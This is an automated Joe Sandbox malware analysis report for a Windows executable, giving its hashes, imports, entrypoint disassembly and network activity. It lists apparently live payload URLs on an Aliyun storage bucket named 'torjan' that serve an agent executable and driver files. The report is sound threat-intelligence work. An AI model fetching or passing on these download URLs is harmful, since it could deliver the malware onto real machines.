⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Agent.exe	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/ProtectDriver/x64_Defender.dat	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/ProtectDriver/x64_FsFilter.dat	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_Defender.dathttps:	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_FsFilter.dat	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.ini	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_Defender.dat	dinhVFAbgo.exe	false	high
https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.inihttps://wtyjqp	dinhVFAbgo.exe	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
59.110.190.41	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626617
Start date and time: 14/05/202216:17:10	2022-05-14 16:17:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	dinhVFAbgo (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.evad.winEXE@4/0@6/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 21.4% (good quality ratio 20.6%) Quality average: 72% Quality standard deviation: 24.4%
HCA Information:	Successful, ratio: 81% Number of executed functions: 29 Number of non-executed functions: 342
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	1isequal9.arm	Get hash	malicious	Browse	39.103.117.239
	sora.arm	Get hash	malicious	Browse	8.173.77.185
	tU468ylYjx	Get hash	malicious	Browse	8.156.208.151
	0vFX7VXc9U	Get hash	malicious	Browse	47.111.235.144
	VQemUYjLmL	Get hash	malicious	Browse	47.112.150.22
	pjT3uuMrF1	Get hash	malicious	Browse	118.31.117.207
	aqua.arm	Get hash	malicious	Browse	101.132.101.69
	iWlIMKfB1x	Get hash	malicious	Browse	47.99.216.231
	ZG9zarm7	Get hash	malicious	Browse	8.152.47.117
	UR0w9ZKXQ2	Get hash	malicious	Browse	118.178.0.255
	dEQ1kYJPQH	Get hash	malicious	Browse	8.159.197.123
	sora.x86	Get hash	malicious	Browse	8.163.233.235
	7dZnLiwzlM	Get hash	malicious	Browse	101.135.155.113
	percarm	Get hash	malicious	Browse	39.103.12.7
	Advice FTT5378393.exe	Get hash	malicious	Browse	203.107.45.167
	x86	Get hash	malicious	Browse	47.105.148.40
	Y81tD2Xh1s	Get hash	malicious	Browse	47.126.219.42
	z4ehq74vWO	Get hash	malicious	Browse	223.7.222.44
	9N2o3hk1Xl	Get hash	malicious	Browse	182.95.147.86
	arm	Get hash	malicious	Browse	47.118.89.189

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.69479192175591
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	dinhVFAbgo.exe
File size:	2117120
MD5:	de3eafb5fa64237cb2d54949c432f19c
SHA1:	bbb3d8d70e1416241b469c3f58596986957ac39d
SHA256:	93d2edbc498f6f8689223bcb079143a97627efe9c1f7b23687a94a1eaf223d78
SHA512:	e01e963313fdede9144ddd4133a2f101177659902d821c994527ab4db627d5ce56e2e34d8c818b4bcbebe2fdfe74e9f0d15b715afa5df89ecfbe8eb73427b0c6
SSDEEP:	49152:UrvyLvF8NpuhRmx6uh9ooXXLEUajSrD7mp46RleP1qKcb1Rckjv+cAc3r4dbC:gvYvFcIhEx6uboonLzQSrD7mpdRleP1G
TLSH:	13A57E21798048B7C1231E31B94BF379F2BD65FC0B3549C7F3B49A682966082962DD6F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%.~.v.~.v.~.v...w.~.v..6v.~.v...w.~.v...wn~.v...w.~.v...w.~.v.~.v.}.v...w.~.v...w.~.v...w...v!..w.~.v!.4v.~.v!..w.~.vRich.~.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x53d4f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x627F900D [Sat May 14 11:18:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	6568687b2c9d225811191553890bdbf0

Entrypoint Preview

Instruction
call 00007F26A8ABD40Bh
jmp 00007F26A8ABC9C9h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F26A8ABC20Bh
jmp 00007F26A8ABCB32h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F26A8ABC1FCh
jmp 00007F26A8ABCB23h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005C8DD4h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005C8DD4h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005C8DD4h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c44f0	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ea000	0x290	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1eb000	0x212fc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1ac8c8	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1ac9c0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1ac900	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x177000	0xa64	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17503b	0x175200	False	0.536344482831	data	6.49979287563	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x177000	0x50d5c	0x50e00	False	0.313683346213	data	5.22429967148	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c8000	0x218ac	0x1d200	False	0.851579265021	data	7.76150366143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1ea000	0x290	0x400	False	0.3388671875	data	3.88622144753	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1eb000	0x212fc	0x21400	False	0.464740953947	data	6.57292806881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x1ea060	0x22f	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	LCMapStringW, CompareStringW, GetStdHandle, QueryPerformanceFrequency, GetCommandLineW, GetCommandLineA, HeapQueryInformation, SetStdHandle, FreeLibraryAndExitThread, ExitThread, EnumSystemLocalesW, ReadConsoleW, CreateFileW, GetModuleHandleExW, VirtualQuery, VirtualAlloc, RtlUnwind, GetStringTypeW, LCMapStringEx, InitializeCriticalSectionEx, OutputDebugStringW, IsValidLocale, SetFilePointerEx, GetConsoleOutputCP, GetFileType, GetFileAttributesExW, GetExitCodeProcess, CreateProcessW, GetTimeZoneInformation, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, WriteConsoleW, InitializeSListHead, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetStartupInfoW, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, CreateEventW, GetUserDefaultLCID, GetTempFileNameA, SearchPathA, GetProfileIntA, GetTempPathA, VerifyVersionInfoA, VerSetConditionMask, GetWindowsDirectoryA, FindResourceExW, GetCurrentDirectoryA, GetConsoleMode, GetACP, GetCPInfo, GetOEMCP, VirtualProtect, GetUserDefaultUILanguage, GetLocaleInfoW, GlobalFlags, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, lstrcmpW, GlobalDeleteAtom, GetSystemDirectoryW, EncodePointer, GetFileTime, GetFileSizeEx, GetFileAttributesExA, FileTimeToLocalFileTime, GlobalGetAtomNameA, lstrcmpA, GetCurrentProcessId, LocalReAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, CompareStringA, ResumeThread, SetThreadPriority, GetCurrentThreadId, GetModuleFileNameA, DuplicateHandle, GetVolumeInformationA, WriteFile, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetFileSize, FlushFileBuffers, FindFirstFileA, FindClose, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, LoadLibraryW, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeLibrary, LeaveCriticalSection, EnterCriticalSection, OutputDebugStringA, CopyFileA, FormatMessageA, MulDiv, GlobalFree, GlobalLock, GlobalUnlock, GlobalSize, GlobalAlloc, GetFileAttributesA, GetFullPathNameA, OpenThread, GetConsoleWindow, LocalFree, CreateThread, LoadLibraryA, TerminateThread, GetCurrentThread, LocalAlloc, CreateMutexA, Thread32First, Thread32Next, HeapFree, GetCurrentProcess, SetLastError, lstrcmpiA, lstrcpyA, GetProcAddress, GetSystemInfo, Process32Next, GetVersionExA, CreateToolhelp32Snapshot, OpenProcess, GetModuleHandleA, TerminateProcess, Process32First, GetTickCount, GetPrivateProfileStringA, ExitProcess, WritePrivateProfileStringA, CreateFileA, DeviceIoControl, Sleep, CreateProcessA, FindResourceW, LoadResource, CloseHandle, DeleteFileA, LockResource, WaitForSingleObject, SizeofResource, WideCharToMultiByte, GetProcessHeap, DeleteCriticalSection, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, GetLastError, MultiByteToWideChar, HeapSize, InitializeCriticalSectionAndSpinCount
USER32.dll	SetTimer, DeleteMenu, SetCursor, ShowOwnedPopups, LoadImageW, InvalidateRect, TrackMouseEvent, IntersectRect, MapDialogRect, GetAsyncKeyState, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, PostQuitMessage, OffsetRect, SetRectEmpty, CopyImage, SystemParametersInfoA, InflateRect, GetMenuItemInfoA, DestroyMenu, FillRect, GetWindowDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, RealChildWindowFromPoint, ClientToScreen, DestroyIcon, IsDialogMessageA, SetWindowTextA, SendDlgItemMessageA, CheckDlgButton, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, GetWindow, GetTopWindow, GetClassLongA, SetWindowLongA, PtInRect, EqualRect, KillTimer, MapWindowPoints, ScreenToClient, AdjustWindowRectEx, GetClientRect, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetCursorPos, CopyIcon, FrameRect, DrawIcon, UnionRect, WaitForInputIdle, GetSystemMetrics, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, UpdateLayeredWindow, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetClipboardData, UpdateWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, SetFocus, GetDlgCtrlID, GetDlgItem, IsIconic, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsMenu, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, PostMessageA, GetMessageTime, GetMessagePos, GetNextDlgGroupItem, SetCapture, ReleaseCapture, DrawFocusRect, IsRectEmpty, LoadImageA, DrawIconEx, GetIconInfo, MessageBeep, EnableScrollBar, HideCaret, InvertRect, LoadCursorW, NotifyWinEvent, CreatePopupMenu, GetMenuDefaultItem, MapVirtualKeyA, GetKeyNameTextA, SetLayeredWindowAttributes, EnumDisplayMonitors, OpenClipboard, CopyRect, GetCursorPos, FindWindowA, EnableMenuItem, WindowFromPoint, GetClassNameA, GetWindowRect, GetSystemMenu, MessageBoxA, GetMenuStringA, GetMenuState, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuA, AppendMenuA, RemoveMenu, GetDesktopWindow, CharUpperA, GetMessageA, TranslateMessage, DispatchMessageA, PeekMessageA, SendMessageA, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, SetWindowsHookExA, CallNextHookEx, UnhookWindowsHookEx, GetDC, ReleaseDC, GetSysColor, GetSysColorBrush, LoadCursorA, EnableWindow, IsWindowEnabled, GetWindowLongA, GetParent, GetWindowThreadProcessId, GetLastActivePopup, GetWindowTextA, GetWindowTextLengthA, GetFocus, CheckMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoA, LoadBitmapW, RegisterWindowMessageA, MonitorFromPoint, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, EmptyClipboard, DrawStateA, SetClassLongA, CloseClipboard, SetWindowRgn, SetParent, DrawEdge, DrawFrameControl, IsZoomed, LoadMenuW, SetActiveWindow, BringWindowToTop, InsertMenuItemA, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, PostThreadMessageA, WaitMessage, GetKeyboardLayout, IsCharLowerA, MapVirtualKeyExA, GetKeyboardState, ToAsciiEx, LoadAcceleratorsW, CreateAcceleratorTableA, DestroyAcceleratorTable, CopyAcceleratorTableA, SetRect, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuA, RegisterClipboardFormatA, CharUpperBuffA, IsClipboardFormatAvailable, GetUpdateRect, DrawMenuBar, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, SubtractRect, DestroyCursor, GetWindowRgn, CreateMenu, RedrawWindow
GDI32.dll	SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetTextAlign, MoveToEx, TextOutA, ExtTextOutA, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectA, GetTextExtentPoint32A, CombineRgn, CreateRectRgnIndirect, PatBlt, SetRectRgn, DPtoLP, GetTextMetricsA, EnumFontFamiliesExA, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, SelectPalette, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, GetTextColor, CreatePolygonRgn, Polygon, Polyline, CreateRoundRectRgn, LPtoDP, Rectangle, GetRgnBox, OffsetRgn, RoundRect, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, ExtFloodFill, SetPaletteEntries, SetPixelV, GetWindowOrgEx, GetViewportOrgEx, GetTextFaceA, SelectObject, ExtSelectClipRgn, SelectClipRgn, SaveDC, RestoreDC, RectVisible, PtVisible, LineTo, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, CreateSolidBrush, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateCompatibleDC, BitBlt, DeleteObject, GetObjectA, SetTextColor, SetBkColor, CreateBitmap, DeleteDC, GetDeviceCaps, CreateDCA, GetBkColor, SetROP2, CopyMetaFileA
MSIMG32.dll	AlphaBlend, TransparentBlt
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegEnumKeyExA, RegDeleteValueA, RegDeleteKeyA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey, RegCreateKeyExA, RegFlushKey, RegSetValueExA, SetSecurityDescriptorDacl, RevertToSelf, AccessCheck, SetSecurityDescriptorOwner, AllocateAndInitializeSid, ImpersonateSelf, IsValidSecurityDescriptor, OpenProcessToken, FreeSid, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, AddAccessAllowedAce, OpenThreadToken, SetSecurityDescriptorGroup, CreateServiceA, CloseServiceHandle, OpenSCManagerA, DeleteService, ControlService, StartServiceA, OpenServiceA
SHELL32.dll	SHGetFileInfoA, SHGetPathFromIDListA, SHGetSpecialFolderLocation, SHGetDesktopFolder, DragQueryFileA, DragFinish, SHAppBarMessage, SHBrowseForFolderA, ShellExecuteA
SHLWAPI.dll	PathStripToRootA, PathFindExtensionA, UrlUnescapeA, PathRemoveFileSpecW, StrFormatKBSizeA, PathFindFileNameA, PathIsUNCA
UxTheme.dll	DrawThemeText, DrawThemeParentBackground, OpenThemeData, CloseThemeData, DrawThemeBackground, GetThemeColor, GetCurrentThemeName, GetWindowTheme, IsAppThemed, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, GetThemePartSize
ole32.dll	OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, DoDragDrop, CreateStreamOnHGlobal, CoDisconnectObject, ReleaseStgMedium, OleDuplicateData, CoTaskMemAlloc, CoTaskMemFree, StringFromCLSID, CoInitialize, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize, OleTranslateAccelerator, IsAccelerator
OLEAUT32.dll	LoadTypeLib, VariantInit, SysFreeString, SysStringByteLen, SysAllocStringByteLen, SysAllocString, VariantClear, VariantTimeToSystemTime, VariantCopy, VariantChangeType, VarBstrFromDate, SysStringLen, SysAllocStringLen, SystemTimeToVariantTime
WS2_32.dll	getprotobyname, WSAStartup, gethostbyname, closesocket, connect, WSACleanup, recv, htons, setsockopt, WSAGetLastError, socket, send
SETUPAPI.dll	SetupDiGetDeviceInstanceIdA, SetupDiEnumDeviceInfo, SetupDiGetClassDevsA, SetupDiChangeState, SetupDiSetClassInstallParamsA, SetupDiClassNameFromGuidA, SetupDiDestroyDeviceInfoList
PSAPI.DLL	GetMappedFileNameA
gdiplus.dll	GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipDeleteGraphics, GdiplusShutdown, GdipAlloc, GdipCreateBitmapFromHBITMAP, GdiplusStartup, GdipCloneImage, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipFree, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipDrawImageI, GdipDisposeImage
WININET.dll	InternetCanonicalizeUrlA, InternetCrackUrlA
OLEACC.dll	AccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
IMM32.dll	ImmReleaseContext, ImmGetOpenStatus, ImmGetContext
WINMM.dll	PlaySoundA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 16:18:12.350311995 CEST	49735	80	192.168.2.3	59.110.190.41
May 14, 2022 16:18:15.361134052 CEST	49735	80	192.168.2.3	59.110.190.41
May 14, 2022 16:18:21.361754894 CEST	49735	80	192.168.2.3	59.110.190.41
May 14, 2022 16:18:34.459714890 CEST	49744	80	192.168.2.3	59.110.190.41
May 14, 2022 16:18:37.472537041 CEST	49744	80	192.168.2.3	59.110.190.41
May 14, 2022 16:18:43.488518000 CEST	49744	80	192.168.2.3	59.110.190.41
May 14, 2022 16:18:57.303878069 CEST	49753	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:00.318156958 CEST	49753	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:06.366174936 CEST	49753	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:19.467772007 CEST	49801	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:22.476288080 CEST	49801	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:28.492398977 CEST	49801	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:41.820693016 CEST	49834	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:44.822033882 CEST	49834	80	192.168.2.3	59.110.190.41
May 14, 2022 16:19:50.838013887 CEST	49834	80	192.168.2.3	59.110.190.41
May 14, 2022 16:20:03.928900957 CEST	49839	80	192.168.2.3	59.110.190.41
May 14, 2022 16:20:06.933067083 CEST	49839	80	192.168.2.3	59.110.190.41
May 14, 2022 16:20:12.949462891 CEST	49839	80	192.168.2.3	59.110.190.41

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 16:18:12.306220055 CEST	55923	53	192.168.2.3	8.8.8.8
May 14, 2022 16:18:12.337354898 CEST	53	55923	8.8.8.8	192.168.2.3
May 14, 2022 16:18:34.429152012 CEST	57723	53	192.168.2.3	8.8.8.8
May 14, 2022 16:18:34.446933985 CEST	53	57723	8.8.8.8	192.168.2.3
May 14, 2022 16:18:56.994458914 CEST	49873	53	192.168.2.3	8.8.8.8
May 14, 2022 16:18:57.302799940 CEST	53	49873	8.8.8.8	192.168.2.3
May 14, 2022 16:19:19.448194981 CEST	63861	53	192.168.2.3	8.8.8.8
May 14, 2022 16:19:19.466698885 CEST	53	63861	8.8.8.8	192.168.2.3
May 14, 2022 16:19:41.650743008 CEST	50450	53	192.168.2.3	8.8.8.8
May 14, 2022 16:19:41.669198990 CEST	53	50450	8.8.8.8	192.168.2.3
May 14, 2022 16:20:03.908246994 CEST	64941	53	192.168.2.3	8.8.8.8
May 14, 2022 16:20:03.927833080 CEST	53	64941	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 14, 2022 16:18:12.306220055 CEST	192.168.2.3	8.8.8.8	0xbee5	Standard query (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)
May 14, 2022 16:18:34.429152012 CEST	192.168.2.3	8.8.8.8	0x9b5	Standard query (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)
May 14, 2022 16:18:56.994458914 CEST	192.168.2.3	8.8.8.8	0xa9b7	Standard query (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)
May 14, 2022 16:19:19.448194981 CEST	192.168.2.3	8.8.8.8	0x4986	Standard query (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)
May 14, 2022 16:19:41.650743008 CEST	192.168.2.3	8.8.8.8	0xa329	Standard query (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)
May 14, 2022 16:20:03.908246994 CEST	192.168.2.3	8.8.8.8	0x6cb5	Standard query (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 14, 2022 16:18:12.337354898 CEST	8.8.8.8	192.168.2.3	0xbee5	No error (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	A (IP address)	IN (0x0001)
May 14, 2022 16:18:34.446933985 CEST	8.8.8.8	192.168.2.3	0x9b5	No error (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	A (IP address)	IN (0x0001)
May 14, 2022 16:18:57.302799940 CEST	8.8.8.8	192.168.2.3	0xa9b7	No error (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	A (IP address)	IN (0x0001)
May 14, 2022 16:19:19.466698885 CEST	8.8.8.8	192.168.2.3	0x4986	No error (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	A (IP address)	IN (0x0001)
May 14, 2022 16:19:41.669198990 CEST	8.8.8.8	192.168.2.3	0xa329	No error (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	A (IP address)	IN (0x0001)
May 14, 2022 16:20:03.927833080 CEST	8.8.8.8	192.168.2.3	0x6cb5	No error (0)	wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com	59.110.190.41	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: dinhVFAbgo.exePID: 6440, Parent PID: 5816

General

Target ID:	0
Start time:	16:18:08
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\dinhVFAbgo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dinhVFAbgo.exe"
Imagebase:	0xca0000
File size:	2117120 bytes
MD5 hash:	DE3EAFB5FA64237CB2D54949C432F19C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

